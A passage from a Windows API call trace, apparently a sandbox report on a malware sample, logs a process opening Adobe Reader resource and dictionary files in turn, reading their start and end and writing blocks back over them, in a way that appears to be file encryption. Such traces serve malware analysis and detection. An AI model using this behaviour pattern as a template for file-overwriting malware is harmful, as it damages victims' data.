10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0099.479] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.480] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7498 [0099.480] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0099.480] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.480] ReleaseMutex (hMutex=0x168) returned 1 [0099.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ru_RU.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.480] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ru_RU.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ru_RU.txt", lpUsedDefaultChar=0x0) returned 30 [0099.480] ReadFile (in: hFile=0x1cc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.556] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6498 [0101.556] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.564] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6498 [0101.564] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.565] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0101.565] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.565] CloseHandle (hObject=0x1cc) returned 1 [0101.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0101.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0101.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x715c [0101.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0101.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.566] ReleaseMutex (hMutex=0x168) returned 1 [0101.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sv_SE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0101.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sv_SE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.sv_SE.txt", lpUsedDefaultChar=0x0) returned 30 [0101.567] ReadFile (in: hFile=0x1cc, lpBuffer=0x2667a68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.573] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x615c [0101.573] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0101.575] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x615c [0101.575] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.575] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0101.575] WriteFile (in: hFile=0x1cc, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.575] CloseHandle (hObject=0x1cc) returned 1 [0101.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara131.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0113.994] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0113.994] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x203800 [0113.995] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0113.995] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.995] ReleaseMutex (hMutex=0x168) returned 1 [0113.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ara131.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0113.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ara131.lex", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ara131.lex", lpUsedDefaultChar=0x0) returned 10 [0113.995] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0113.998] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.000] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0114.001] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x201800 [0114.001] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0114.008] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x201800 [0114.010] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0114.010] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0114.010] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.012] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.012] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0114.012] CloseHandle (hObject=0x1d8) returned 1 [0114.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0114.014] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.014] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x63c [0114.014] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.014] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.014] ReleaseMutex (hMutex=0x168) returned 1 [0114.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="brz.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="brz.fca", lpUsedDefaultChar=0x0) returned 7 [0114.014] ReadFile (in: hFile=0x1d8, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x63c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x359f2bc*=0x63c, lpOverlapped=0x0) returned 1 [0114.016] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0114.016] WriteFile (in: hFile=0x1d8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0xbc4, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x359f2d0*=0xbc4, lpOverlapped=0x0) returned 1 [0114.016] CloseHandle (hObject=0x1d8) returned 1 [0114.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\can.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\can.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0114.018] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.018] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1240 [0114.018] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.019] ReleaseMutex (hMutex=0x168) returned 1 [0114.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="can.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="can.fca", lpUsedDefaultChar=0x0) returned 7 [0114.019] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1240, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x359f2bc*=0x1240, lpOverlapped=0x0) returned 1 [0114.021] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0114.021] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x17c8, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f2d0*=0x17c8, lpOverlapped=0x0) returned 1 [0114.021] CloseHandle (hObject=0x1d8) returned 1 [0114.021] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cfr68.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cfr68.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0114.023] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.023] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3a251 [0114.023] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.023] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.023] ReleaseMutex (hMutex=0x168) returned 1 [0114.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr68.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfr68.hsp", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfr68.hsp", lpUsedDefaultChar=0x0) returned 9 [0114.023] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.026] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x39251 [0114.026] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.027] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x39251 [0114.027] WriteFile (in: hFile=0x1d8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.028] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0114.028] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.028] CloseHandle (hObject=0x1d8) returned 1 [0114.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\cze108.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\cze108.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0114.029] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.029] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x127204 [0114.030] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.030] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.030] ReleaseMutex (hMutex=0x168) returned 1 [0114.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze108.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cze108.hsp", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cze108.hsp", lpUsedDefaultChar=0x0) returned 10 [0114.030] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.639] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.918] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x126204 [0114.918] ReadFile (in: hFile=0x1d8, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.928] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x126204 [0114.929] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.929] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0114.929] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.930] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.930] CloseHandle (hObject=0x1d8) returned 1 [0114.930] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0114.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x11c00 [0114.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.932] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.932] ReleaseMutex (hMutex=0x168) returned 1 [0114.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dut.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.932] ReadFile (in: hFile=0x1d8, lpBuffer=0x2665868, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0114.944] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10c00 [0114.944] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e953d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.965] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x10c00 [0114.965] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667868*, 